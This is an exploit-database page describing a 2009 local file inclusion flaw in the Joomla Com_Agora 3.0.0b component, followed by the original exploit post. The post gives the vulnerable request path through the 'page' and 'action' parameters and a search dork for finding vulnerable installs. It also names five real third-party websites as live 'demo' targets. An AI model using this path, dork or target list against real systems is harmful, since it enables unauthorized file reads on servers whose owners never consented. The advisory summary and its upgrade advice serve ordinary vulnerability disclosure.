header-logo
Suggest Exploit
vendor:
Component Com_Agora
by:
ByALBAYX
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Component Com_Agora
Affected Version From: 3.0.0b
Affected Version To: 3.0.0b
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component Com_Agora Local File Inclusion Vulnerability

A vulnerability in Joomla Component Com_Agora allows an attacker to include local files on the server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'page' parameter in the 'index.php' script when handling requests to the 'com_agora' component. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script. Successful exploitation will result in arbitrary local file inclusion.

Mitigation:

Upgrade to the latest version of Joomla Component Com_Agora.
Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : ByALBAYX
                              
@~~=Website  : WWW.C4TEAM.ORG
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

@~~=T¸m ›slam Aleminin Ramazan-˝ fierifleri Hay˝rl˝ Olsun.

@~~=======================================~~@
@~~=Script   : Joomla Component Com_Agora

@~~=S.Site   : http://joomlame.com
@~~=======================================~~@

@~~=Vuln

             : http://c4team.org/ [Yol] /index.php?option=com_agora&task=profile&page=avatars&action=  [-LFI-]

@~~=Dork

             :Powered by Agora 3.0.0b

@~~=Demo

             :http://haaseit.com/index.php?option=com_agora&task=profile&page=avatars&action=

             :http://fairweatherforge.com/index.php?option=com_agora&task=profile&page=avatars&action=

             :http://piedmontamateurastronomers.com/index.php?option=com_agora&task=profile&page=avatars&action=

             :http://acbnbiz.com/index.php?option=com_agora&task=profile&page=avatars&action=

             :http://v5medical.com/index.php?option=com_agora&task=profile&page=avatars&action=

@~~=Vs.. Vs.. Vs..
@~~=======================================~~@

@~~=ByALBAYX :/

# milw0rm.com [2009-09-01]

Navigation

Suggest Exploit

Services By CQR